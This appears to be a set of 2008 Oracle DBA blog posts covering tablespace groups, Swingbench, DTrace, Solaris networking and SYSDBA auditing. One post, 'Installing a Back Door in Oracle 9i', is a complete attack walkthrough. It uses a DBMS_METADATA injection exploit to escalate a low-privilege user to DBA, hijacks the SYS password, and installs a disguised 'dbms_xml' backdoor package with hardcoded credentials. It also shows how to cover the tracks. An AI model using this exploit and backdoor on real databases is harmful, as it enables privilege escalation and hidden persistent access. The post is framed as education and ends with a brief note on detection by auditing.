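Calling assign("temp_test_1", "temp_group_1") on an empty model creates temp_group_1, and assigning its last member to '' removes the group again.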

SQL> CREATE TEMPORARY TABLESPACE temp_test_1
  2  TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_1.tmp'
  3  SIZE 100 M
  4  TABLESPACE GROUP temp_group_1;

Tablespace created.

SQL>

If the group temp_group_1 did not already exist, it would be created at this time. Now we will create a temporary tablespace but will not add it to the group.

SQL> CREATE TEMPORARY TABLESPACE temp_test_2
  2  TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_2.tmp'
  3  SIZE 100 M
  4  TABLESPACE GROUP '';

Tablespace created.

SQL>

Now we will alter this tablespace and add it to a group.

SQL> ALTER TABLESPACE temp_test_2
  2  TABLESPACE GROUP temp_group_1;

Tablespace altered.

SQL>

To de-assign a temporary tablespace from a group, we issue an ALTER TABLESPACE command as so:

SQL> ALTER TABLESPACE temp_test_2
  2  TABLESPACE GROUP '';

Tablespace altered.

SQL>

Assign Users to Temporary Tablespace Groups

In this example, we will assign the user SCOTT to the temporary tablespace group temp_group_1.

SQL> ALTER USER scott
  2  TEMPORARY TABLESPACE temp_group_1;

User altered.

SQL>

Now when we query the DBA_USERS view to see SCOTT’s default temporary tablespace, we will see that the group is his temporary tablespace now.

SQL> SELECT username, temporary_tablespace
  2  FROM DBA_USERS
  3  WHERE username = 'SCOTT';

USERNAME TEMPORARY_TABLESPACE
-------- ------------------------------
SCOTT    TEMP_GROUP_1

SQL>

Data Dictionary Views

To view a temporary tablespace group and its members, we can query the DBA_TABLESPACE_GROUPS data dictionary view.

SQL> SELECT * FROM DBA_TABLESPACE_GROUPS;

GROUP_NAME   TABLESPACE_NAME
------------ ------------------------------
TEMP_GROUP_1 TEMP_TEST_1
TEMP_GROUP_1 TEMP_TEST_2

SQL>

Advantages of Temporary Tablespace Groups

Allows multiple default temporary tablespaces
A single SQL operation can use multiple temporary tablespaces for sorting
Rather than have all temporary I/O go against a single temporary tablespace, the database can distribute that I/O load among all the temporary tablespaces in the group.
If you perform an operation in parallel, child sessions in that parallel operation are able to use multiple tablespaces.

Playing with Swingbench

2008-11-25T00:00:00-08:00

A Note About the Environment Used for Testing

Before we delve into using Swingbench, I thought I should mention a little about the environment used for testing as it affects the results a lot! The box used to run the database in this post is a Dell Latitude D810 laptop with a 2.13 GHz processor and 1GB of RAM. It is running on Solaris 10, specifically the 11/06 release. The datafiles and redo log files are stored on a Maxtor OneTouch II external hard drive connected via a USB 2.0 interface.

The datafiles for the database reside on an 80 GB partition which is formatted with a UFS filesystem and the redo logs reside on a 20 GB partition which is also formatted with a UFS filesystem. The database is not running in archive log mode and there is no flash recovery area configured.

Enabling Direct I/O

A quick section on how we will be enabling direct I/O for testing purposes. The UFS file system (like most file systems) supports mount options which enable processes to bypass the OS page cache. One way to enable direct I/O on a UFS file system is to mount the file system with the forcedirectio mount option like so:

# mount -o forcedirectio /dev/dsk/c2t1d0s1 /u02

Another possible method is setting the FILESYSTEMIO_OPTIONS=SETALL parameter within Oracle (available in 9i and later). As Glenn Fawcett states in this excellent post on direct I/O, the SETALL value passed to the FILESYSTEMIO_OPTIONS parameter sets all the options for a particular file system to enable direct I/O or async I/O. When this parameter is set as stated, Oracle will use an API to enable direct I/O when it opens database files.

Swingbench Installation and Configuration

Now that we’ve got the preliminaries out of the way, it’s time to get on to the main reason for this post. The Swingbench code is shipped in a zip file which can be downloaded from here. A prerequisite for running Swingbench is that a Java virtual machine needs to be present on the machine on which you will be running Swingbench.

After unzipping the Swingbench zip file, you will need to edit the swingbench.env file (if on a UNIX platform) found in the top-level swingbench directory. The following variables need to be modified according to your environment:

ORACLE_HOME
JAVA_HOME
SWINGHOME

If you are using the Oracle Instant Client software instead of a full RDBMS install on the machine on which you are running Swingbench, the CLASSPATH variable must also be modified from $ORACLE_HOME/jdbc/lib/ojdbc14.jar to $ORACLE_HOME/lib/ojdbc14.jar.

Installing Calling Circle

The Calling Circle is an open-source preconfigured benchmark which comes with Swingbench. The Order Entry benchmark also comes with Swingbench but for the purposes of this article, we will only discuss the Calling Circle benchmark.

The Calling Circle benchmark implements an example OLTP online telecommunications application. The goal of this application is to simulate a randomized workload of customer transactions and measure transaction throughput and response times. Approximately 97% of the transactions cause at least one database update, with well over three quarters performing two or more updates. More information can be found in the Readme.txt file which comes with the Swingbench software.

The first step for installing Calling Circle is to create the Calling Circle schema (CC) in the database. This is achieved using the ccwizard executable found in the swingbench/bin directory.

$ ./ccwizard

Click Next on the welcome screen and you will then be presented with the screen shown below:

Choose the option to create the Calling Circle schema. In the next screen, enter the connection details of the database you will be creating the schema in. This will involve entering the host name, port number (if not using the default port of 1521 for your listener) and the database service name. Also, ensure that you choose the type IV Thin JDBC driver. Click Next when you have entered this information.

The next screen involves the schema details for the Calling Circle schema. Enter appropriate locations for the datafiles on your system. When finished entering information on this screen, click Next to continue. This will bring you to the Schema Sizing window as shown below:

Use the slider to select the schema size you wish to use. For this post, I chose to use a schema size with 2,023,019 customers which implies a tablespace of size 2.1GB for data and a tablespace of size 1.3GB for indexes. When finished choosing your schema size, click Next to continue. Click Finish on the next screen to complete the wizard and create the schema. A progress bar will appear as shown below.

Creating the Input Data for Calling Circle

Before each run of the Calling Circle application it is necessary to create the input data for the benchmark to run. This is accomplished using the ccwizard program we used previously for creating the Calling Circle schema. Start up the ccwizard program again and click Next on the welcome screen. On the “Select Task” screen shown previously, this time select “Generate Data for Benchmark Run” and click Next.

In the “Schema Details” window which follows, enter the details of the schema which you created in the last section. Click Next once all the necessary information has been entered. You will then be presented with the “Benchmark Details” screen as shown below:

In this post, we will use 1000 transactions for each test as seen in the “Number of Transactions” dialog window above. Press Next to continue and you will be presented with the final screen. Click Finish to create the benchmark data.

Starting the Benchmark Test

Now that we have the Calling Circle schema created and the input data generated, we can start our tests. To start up Swingbench and ensure that it operates with the Calling Circle benchmark we can pass the sample Calling Circle configuration file (ccconfig.xml) which is supplied with Swingbench as a runtime parameter as so:

$ ./swingbench -c sample/ccconfig.xml

This will start up Swingbench with the sample configuration for the Calling Circle application. Only a few settings need to be changed for us to use this configuration: the connection settings for the host on which you have already set up the Calling Circle schema. Change the connection settings as necessary for your environment.

The following screenshot shows the Calling Circle application running in Swingbench:

We will be performing 1000 transactions during each test run as specified when we generated the sample data. The Swingbench configuration we will be using for every test we perform is as follows:

This workload is typical of an OLTP application with 40% reads and 60% writes. The number of users associated with the workload is 15. We will use this exact workload for every test we perform.

Results & Conclusion

The measurements from Swingbench which we will use for comparing the performance of a UFS file system when Oracle uses direct I/O versus buffered I/O are the following:

Transaction throughput (number of transactions per minute)
Average response time for each transaction type

We will perform a run of the benchmark 5 times for each configuration we want to compare and then present the average of the measurements below. So we will run the tests 5 times with buffered I/O and then 5 times with un-buffered I/O by setting the FILESYSTEMIO_OPTIONS parameter.
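
The averaging step described above is simple enough to sketch in a few lines of Python. The metric names (tpm, avg_response_ms) and the numbers in the usage note are placeholders I made up for illustration; they are not measurements from these tests.

```python
from statistics import mean


def summarize(runs):
    """Average each metric across runs.

    Each run is a dict mapping a metric name to its value for that run;
    all runs are assumed to report the same metrics.
    """
    metrics = runs[0].keys()
    return {metric: mean(run[metric] for run in runs) for metric in metrics}
```

For example, five placeholder runs reporting tpm values of 10, 20, 30, 40 and 50 would be summarized as a single tpm figure, and the same function would be applied once to the buffered runs and once to the direct I/O runs before comparing them.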

So the comparisons from these 2 measurements are as follows:

While these tests were not very conclusive or thorough, they do show how Swingbench can be used for generating database activity. The measurements which I compared are only some of the measurements which Swingbench reports when finished running a benchmark. Hopefully I will be able to play and post a bit more on the excellent Swingbench utility in the future.

OCFS2 Mount by Label Support

2008-11-25T00:00:00-08:00

While messing around with OCFS2 on my RHEL4 install, I discovered that if I created an OCFS2 filesystem with a label, I was unable to mount it by that label. I would encounter the following:

# mount -L "oradata" /ocfs2
mount: no such partition found

I found this quite strange and did some investigation. The version of util-linux that was present on my system after a fresh RHEL 4 install was - util-linux-2.12a-16.EL4.6.

So I grabbed the latest version of util-linux from Red Hat and voilà, I am now able to mount an OCFS2 filesystem by its label.

The current version of util-linux on my system is - util-linux-2.12a-16.EL4.20.

Observing Oracle I/O Access Patterns with DTrace

2008-11-25T00:00:00-08:00

In this post, I will use the seeks.d and iopattern DTrace scripts, which are available as part of the DTraceToolkit (an extremely useful collection of scripts created by Brendan Gregg), to view the I/O access patterns typical of Oracle. DTrace is able to capture data throughout the kernel, so the job of finding access patterns has been greatly simplified.

The system on which these examples are being run has redo logs on one disk, datafiles on another disk and the control file on a third disk.

To get system-wide access patterns, the iopattern script can be used. Sample output is as follows:

# ./iopattern
%RAN %SEQ  COUNT    MIN      MAX    AVG     KR     KW
 100    0      7   4096     8192   7606      4     48
   0    0      0      0        0      0      0      0
   0    0      0      0        0      0      0      0
 100    0      6   8192     8192   8192      0     48
   0    0      0      0        0      0      0      0
   0    0      0      0        0      0      0      0
 100    0      6   8192     8192   8192      0     48
   0    0      0      0        0      0      0      0
   0    0      0      0        0      0      0      0
 100    0      6   8192     8192   8192      0     48
   0    0      0      0        0      0      0      0

This output was generated on an idle system (0.04 load). You can see that the iopattern script provides the percentage of random and sequential I/O on the system. During this monitoring period while the system was idle, all the I/O was random. The iopattern script also provides the number and total size of the I/O operations performed during the sample period, and it provides the minimum, maximum, and average I/O sizes.

Now, look at the output generated from the iopattern script during a period of heavy database load:

# ./iopattern
%RAN %SEQ  COUNT    MIN      MAX    AVG     KR     KW
  92    8     69   4096     8192   6589    304    140
  86   14     69   4096     8192   5995    228    176
  82   18     67   4096     8192   5257     64    280
  84   16     19   4096     8192   6036     40     72
  77   23     22   4096     8192   4282      0     92
  88   12     68   4096  1015808  21744   1120    324
  97    3     67   4096     8192   7274    400     76
  89   11     66   4096     8192   6392    276    136
  90   10     71   4096     8192   6345    216    224
  87   13     62   4096     8192   5879    184    172
  90   10     10   4096     8192   6553     40     24
 100    0     17   8192     8192   8192     88     48
  87   13     33   4096  1048576  38353   1168     68
  86   14     65   4096     8192   6049    236    148

As you can see from the above output, the majority of the I/O which occurs during this period is random. In my mind, this is one indication that the type of I/O typical in an OLTP environment is random (as we would expect).
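
To put a single number on "the majority", the heavy-load samples can be combined into one I/O-weighted figure. The following Python sketch parses the iopattern rows shown above and weights each sample's %RAN by its COUNT; the function names are my own, and the script is just a convenience for reading the output, not part of the DTraceToolkit.

```python
SAMPLE = """\
%RAN %SEQ COUNT MIN MAX AVG KR KW
92 8 69 4096 8192 6589 304 140
86 14 69 4096 8192 5995 228 176
82 18 67 4096 8192 5257 64 280
84 16 19 4096 8192 6036 40 72
77 23 22 4096 8192 4282 0 92
88 12 68 4096 1015808 21744 1120 324
97 3 67 4096 8192 7274 400 76
89 11 66 4096 8192 6392 276 136
90 10 71 4096 8192 6345 216 224
87 13 62 4096 8192 5879 184 172
90 10 10 4096 8192 6553 40 24
100 0 17 8192 8192 8192 88 48
87 13 33 4096 1048576 38353 1168 68
86 14 65 4096 8192 6049 236 148
"""


def parse_iopattern(text):
    """Turn iopattern output (header line plus rows) into a list of dicts."""
    lines = [line.split() for line in text.strip().splitlines()]
    header, rows = lines[0], lines[1:]
    return [dict(zip(header, map(int, row))) for row in rows]


def weighted_random_pct(rows):
    """Percentage of random I/O, weighting each sample by its I/O count."""
    total = sum(row["COUNT"] for row in rows)
    if total == 0:
        return 0.0  # idle samples only: nothing to weight
    return sum(row["%RAN"] * row["COUNT"] for row in rows) / total


if __name__ == "__main__":
    print(round(weighted_random_pct(parse_iopattern(SAMPLE)), 1))
```

Weighting by COUNT keeps a sample with 10 I/Os from counting as much as one with 70.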

To get the I/O distribution for each disk, the seeks.d script can be used. This script measures the seek distance for disk events and generates a distribution plot. This script is based on the seeksize.d script provided with the DTraceToolkit and is available in the Solaris Internals volumes.

Sample output from the seeks.d script is shown below:

# ./seeks.d
Tracing... Hit Ctrl-C to end.
^C

  cmdk0
           value  ------------- Distribution ------------- count
              -1 |                                         0
               0 |@@@@@@@@@@@@@@@@@@@@@                    43
               1 |                                         0
               2 |                                         0
               4 |                                         0
               8 |                                         0
              16 |                                         0
              32 |                                         0
              64 |                                         0
             128 |@@@@@@@@@@@@@                            26
             256 |@@@@@@                                   12
             512 |                                         0

  sd1
           value  ------------- Distribution ------------- count
           32768 |                                         0
           65536 |@@@@@@@@@@@@@@@@@@@@                     1
          131072 |                                         0
          262144 |                                         0
          524288 |                                         0
         1048576 |@@@@@@@@@@@@@@@@@@@@                     1
         2097152 |                                         0

This output was generated when the system was idle, as before. It summarizes the seeks performed by each disk on the system. The sd1 disk in the output above is the disk on which my Oracle datafiles reside. The value column in the output indicates the size of the seek that was performed in bytes. This indicates some random I/O on this disk since the length of the seeks is quite large. The disk on which the redo logs are located (sd2) does not show up in the output above since no I/O is being generated on that disk. Now, it is interesting to look at the output generated from the seeks.d script during a period when the database is under a heavy load.

# ./seeks.d
Tracing... Hit Ctrl-C to end.
^C

  cmdk0
           value  ------------- Distribution ------------- count
              -1 |                                         0
               0 |@@@@@@@@@@@@@@@@@@@@@@@                  18
               1 |                                         0
               2 |                                         0
               4 |                                         0
               8 |                                         0
              16 |                                         0
              32 |                                         0
              64 |                                         0
             128 |@@@@@@@@@@@@@                            10
             256 |@@@@@                                    4
             512 |                                         0

  sd2
           value  ------------- Distribution ------------- count
              -1 |                                         0
               0 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@           430
               1 |                                         0
               2 |                                         0
               4 |                                         0
               8 |@@@@@@@@                                 120
              16 |@                                        11
              32 |                                         3
              64 |                                         0
             128 |                                         0
             256 |                                         0
             512 |                                         0
            1024 |                                         0
            2048 |                                         0
            4096 |                                         0
            8192 |                                         0
           16384 |                                         0
           32768 |                                         0
           65536 |                                         6
          131072 |                                         0

  sd1
           value  ------------- Distribution ------------- count
             512 |                                         0
            1024 |@@@                                      31
            2048 |                                         5
            4096 |                                         0
            8192 |                                         0
           16384 |                                         0
           32768 |                                         0
           65536 |@@                                       23
          131072 |@@@@@@@@                                 92
          262144 |@@@@@@@                                  73
          524288 |@                                        6
         1048576 |                                         4
         2097152 |@                                        14
         4194304 |@@@                                      29
         8388608 |@@@@                                     40
        16777216 |@@@@@                                    56
        33554432 |@@@@@@                                   65
        67108864 |                                         0

This time the disk on which the redo logs are located shows up as there is activity occurring on it. You can see that most of this activity is sequential as most of the events incurred a zero-length seek. This makes sense as the log writer background process (LGWR) writes the redo log files in a sequential manner. However, you can see that I/O on the disk which contains the Oracle datafiles is random as seen by the distributed seek lengths (up to the 33554432 to 67108864 bucket).
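
For readers unfamiliar with these plots, each row is a power-of-two bucket: the row labelled 128 counts seeks of 128 up to 255, and so on. The Python sketch below mimics that bucketing for a list of I/Os. It is an illustration only, not the seeks.d script; I am assuming a seek distance is measured from the end of the previous I/O to the start of the next one, and the names bucket and seek_histogram are hypothetical.

```python
from collections import Counter


def bucket(distance):
    """Return the power-of-two bucket that holds a non-negative distance."""
    if distance <= 0:
        return 0
    return 1 << (distance.bit_length() - 1)  # largest power of two <= distance


def seek_histogram(ios):
    """Count seek distances per bucket for a list of (start, length) I/Os."""
    hist = Counter()
    last_end = None
    for start, length in ios:
        if last_end is not None:
            # Distance between where the last I/O ended and this one starts.
            hist[bucket(abs(start - last_end))] += 1
        last_end = start + length
    return hist
```

A purely sequential stream lands entirely in the 0 bucket, which is the shape seen for the redo log disk, while scattered offsets spread across the larger buckets as they do for the datafile disk.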

The above post did not really contain any new information but I thought it would be cool to show a tiny bit of what DTrace makes possible. This is one of the coolest tools I have used in the last year and is one of the many reasons why I have become a huge Solaris fan!

Installing & Configuring a USB NIC on Solaris

2008-11-25T00:00:00-08:00

In this post, I will provide a very quick overview of how to install and configure a USB network interface on Solaris.

Obtaining the USB Driver

The driver for a generic USB network interface, which should cover the majority of USB NIC devices, can be downloaded from here.

Installing the USB Driver

After downloading the driver, uncompress the gzipped file and extract the archive as the root user.

# gunzip upf-0.8.0.tar.gz ; tar xvf upf-0.8.0.tar

This will create a upf-0.8.0 directory in the current directory. Change to the upf-0.8.0 directory. Now we need to perform the following to install the driver:

# make install
# ./adddrv.sh

After this has been completed, the driver is installed but the system needs to be rebooted before we can use it. Reboot the system using the following procedure:

# touch /reconfigure
# shutdown -i 0 -g0 -y

This will scan for new hardware on reboot. The new NIC device will show up as /dev/upf0.

Configuring the NIC Device

Once the USB driver has been installed and the system has been rebooted correctly, the NIC device can be configured as follows. (In this example, we will just make up an IP address to use.)

# ifconfig upf0 plumb
# ifconfig upf0 192.168.2.111 netmask 255.255.255.0 up

Making Sure the NIC Device Starts on Boot

To ensure that the new NIC device starts automatically on boot, we need to create an /etc/hostname.upf0 file for that interface. It should contain either the IP address configured for the interface or, if we placed the IP address in the /etc/inet/hosts file, the hostname for that interface.

Installing a Back Door in Oracle 9i

2008-11-25T00:00:00-08:00

In this post, we will demonstrate a way an attacker could install a back door in a 9i Oracle database. The information in this post is based on information obtained from Pete Finnigan's website and 2600 magazine. The version of the database we are using in this post is:

sys@ORA9R2> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production

Creating the User

In this example, we will create the user that the back door will be installed with. We will presume that either an attacker has already gained access to this account or that a legitimate user wishes to install a back door in our database (the so-called insider threat). The user we will install the back door as is testUser. We will only grant CONNECT and RESOURCE to this user.

sys@ORA9R2> create user testUser identified by testUser;

User created.

sys@ORA9R2> grant connect, resource to testUser;

Grant succeeded.

sys@ORA9R2> connect testUser/testUser
Connected.
testuser@ORA9R2> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT      NO  YES NO
TESTUSER RESOURCE     NO  YES NO

testuser@ORA9R2>

Gaining DBA Privileges

Now we will use a known exploit in the 9i version of Oracle that will allow this user to obtain the DBA role. This exploit is described in the document 'Many Ways to Become DBA' by Pete Finnigan. It involves creating a function and then exploiting a known vulnerability in the DBMS_METADATA package.

testuser@ORA9R2> create or replace function testuser.hack return varchar2
  2  authid current_user is
  3  pragma autonomous_transaction;
  4  begin
  5  execute immediate 'grant dba to testUser';
  6  return '';
  7  end;
  8  /

Function created.

testuser@ORA9R2> select sys.dbms_metadata.get_ddl('''||testuser.hack()||''','')
  2  from dual;
ERROR:
ORA-31600: invalid input value '||testuser.hack()||' for parameter OBJECT_TYPE in function GET_DDL
ORA-06512: at "SYS.DBMS_SYS_ERROR", line 105
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1536
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1900
ORA-06512: at "SYS.DBMS_METADATA_INT", line 3606
ORA-06512: at "SYS.DBMS_METADATA", line 504
ORA-06512: at "SYS.DBMS_METADATA", line 560
ORA-06512: at "SYS.DBMS_METADATA", line 1221
ORA-06512: at line 1

no rows selected

testuser@ORA9R2> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT      NO  YES NO
TESTUSER DBA          NO  YES NO
TESTUSER RESOURCE     NO  YES NO

testuser@ORA9R2>

As you can see from the output above, the attacker has now gained the DBA role. Now, the attacker can start working on installing the back door.

Creating and Installing the Back Door

Before installing the back door, he/she saves the encrypted form of the SYS user's password.

testuser@ORA9R2> select username, password
  2  from dba_users
  3  where username = 'SYS' ;

USERNAME PASSWORD
-------- ------------------------------
SYS      43CA255A7916ECFE

testuser@ORA9R2>

Now, the attacker wants to install the back door as the SYS user, so he/she alters the password of the SYS user in order to connect as SYS. The attacker will then change this password back to the saved password once finished installing the back door.

testuser@ORA9R2> alter user sys identified by pass;

User altered.

testuser@ORA9R2> connect sys/pass as sysdba
Connected.
testuser@ORA9R2>

Now the attacker is connected as the SYS user and starts on creating the back door. The attacker creates the back door like so:

testuser@ORA9R2> CREATE OR REPLACE PACKAGE dbms_xml AS
  2  PROCEDURE parse (string IN VARCHAR2);
  3  END dbms_xml;
  4  /

Package created.

testuser@ORA9R2> CREATE OR REPLACE PACKAGE BODY dbms_xml AS
PROCEDURE parse (string IN VARCHAR2) IS
  var1 VARCHAR2 (100);
BEGIN
  IF string = 'unlock' THEN
    SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS';
    EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))';
    EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')';
    COMMIT;
    EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY padraig';
  END IF;
  IF string = 'lock' THEN
    EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1;
    EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||'''';
    EXECUTE IMMEDIATE 'DROP TABLE syspa1';
  END IF;
  IF string = 'make' THEN
    EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY padraig';
    EXECUTE IMMEDIATE 'GRANT DBA TO hill';
  END IF;
  IF string = 'unmake' THEN
    EXECUTE IMMEDIATE 'DROP USER hill CASCADE';
  END IF;
END;
END dbms_xml;
/

testuser@ORA9R2> CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml;

Synonym created.

testuser@ORA9R2> GRANT EXECUTE ON dbms_xml TO PUBLIC;

Grant succeeded.

testuser@ORA9R2>

This package does the following (examples will be shown below):

It can unlock the SYS account by changing the password to a known password (in this case 'padraig').

Then, it can revert the SYS account's password back to the original password.

It can create a new user account with a known password that has the DBA role which can later be dropped from the database.

The attacker has now created a back door that can be very difficult to discover. The attacker has chosen a name for the package that looks like it was installed with the Oracle database. Now, the attacker changes the SYS user's password back to its original value to prevent the DBA from noticing that the SYS account has been hijacked. The attacker will also revoke the DBA role from his/her user account to prevent detection. This role is no longer needed by the attacker since he/she has installed the back door.

testuser@ORA9R2> alter user sys identified by values '43CA255A7916ECFE';

User altered.

testuser@ORA9R2> revoke dba from testUser;

Revoke succeeded.

testuser@ORA9R2> disconnect
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
testuser@ORA9R2> connect testUser/testUser
Connected.
testuser@ORA9R2> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT      NO  YES NO
TESTUSER RESOURCE     NO  YES NO

In this first example, the attacker is going to use his/her back door to unlock the SYS account and connect as the SYS user.

testuser@ORA9R2> execute dbms_xml.parse('unlock');

PL/SQL procedure successfully completed.

testuser@ORA9R2> connect sys/padraig as sysdba
Connected.
testuser@ORA9R2> show user
USER is "SYS"
testuser@ORA9R2>

Now, the attacker is finished doing his/her work as the SYS user and will change the SYS password back to the original password by calling the back door again:

testuser@ORA9R2> execute dbms_xml.parse('lock');

PL/SQL procedure successfully completed.

testuser@ORA9R2>

Conclusion

This post showed how an attacker could exploit a known vulnerability in Oracle 9i to obtain DBA privileges and install a back door in an Oracle database. Of course, a wary DBA could detect this by auditing the ALTER USER statement and checking SYS-owned objects periodically.
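
The periodic check of SYS-owned objects boils down to comparing a trusted baseline against the current state. Here is a minimal Python sketch of that comparison. It assumes each snapshot is a list of (owner, object_name, object_type) tuples, for example exported from the DBA_OBJECTS view; the function name new_objects and the sample baseline are hypothetical.

```python
def new_objects(baseline, current):
    """Return objects present in current but missing from baseline, sorted."""
    return sorted(set(current) - set(baseline))


# Hypothetical snapshots for illustration; a real baseline would be taken
# from a known-good database and would be far longer.
baseline = [
    ("SYS", "DBMS_METADATA", "PACKAGE"),
    ("SYS", "DBMS_METADATA", "PACKAGE BODY"),
]
current = baseline + [
    ("SYS", "DBMS_XML", "PACKAGE"),
    ("SYS", "DBMS_XML", "PACKAGE BODY"),
]

if __name__ == "__main__":
    for owner, name, object_type in new_objects(baseline, current):
        print(owner, name, object_type)
```

A plausible-looking name such as DBMS_XML offers no cover against this kind of check, because the comparison only cares that the object was not there before.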

Generating a System State Dump on HP-UX with gdb

2008-11-25T00:00:00-08:00

I have previously used gdb (the GNU Debugger) to generate Oracle system state dumps on Linux systems by attaching to an Oracle process. The ability to do this has been well documented by Oracle on Metalink (Note 121779.1) and in other locations.

The problem with this is that it does not work on the HP-UX platform. I found this out at the wrong time when trying to generate a system state dump during a database hang!

Apparently, the Oracle executable needs to be re-linked on the HP-UX platform to enable the gdb debugger to generate system state dumps by attaching to an Oracle process.

You can see all the gory details in Metalink Note 273324.1. I posted it here as I thought it might prove useful for me to have this information somewhere should I forget it in the future...

Auditing SYSDBA Users

2008-11-25T00:00:00-08:00

I recently came across this feature in Oracle, introduced in 9i, where all operations performed by a user connecting as SYSDBA are logged to an OS file. I'm sure most DBAs are familiar with this feature already but I have only just been enlightened!

To enable this feature, auditing must be enabled and the AUDIT_SYS_OPERATIONS parameter must be set to TRUE. For example:

sys@ORCLINS1> ALTER SYSTEM SET AUDIT_SYS_OPERATIONS = TRUE SCOPE=SPFILE;

FALSE is the default value for this parameter. As the SCOPE=SPFILE clause in the above statement suggests, the database must be restarted for the parameter to take effect.

All the audit records are then written to an operating system file. The location of this file is determined by the AUDIT_FILE_DEST parameter.

sys@ORCLINS1> show parameter AUDIT_FILE_DEST

NAME            TYPE   VALUE
--------------- ------ ----------------------------------
audit_file_dest string /oracle/oracle/admin/orclpad/adump
sys@ORCLINS1>

An audit file will be created for each session started by a user logging in as SYSDBA. The audit file will contain the process ID of the server session that Oracle started for the user in its file name.

Most people are probably already familiar with this handy feature but I like to have it documented for myself somewhere so I put it here!
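
Since the process ID is part of the audit file name, finding the file for a given session can be scripted. The Python sketch below lists the files in the audit directory whose names contain a given PID. The .aud extension and names of the form ora_1234.aud are my assumption about the naming scheme, so adjust the match for your release; the function name audit_files_for_pid is hypothetical.

```python
import os
import re


def audit_files_for_pid(audit_dir, pid):
    """Return .aud files in audit_dir whose name contains pid as a whole number."""
    # The lookarounds stop PID 1234 from also matching a file for PID 12345.
    pattern = re.compile(r"(?<!\d)" + str(pid) + r"(?!\d)")
    return sorted(
        name
        for name in os.listdir(audit_dir)
        if name.endswith(".aud") and pattern.search(name)
    )
```

The audit_dir argument would be the value of AUDIT_FILE_DEST, and the PID is that of the server process started for the SYSDBA session.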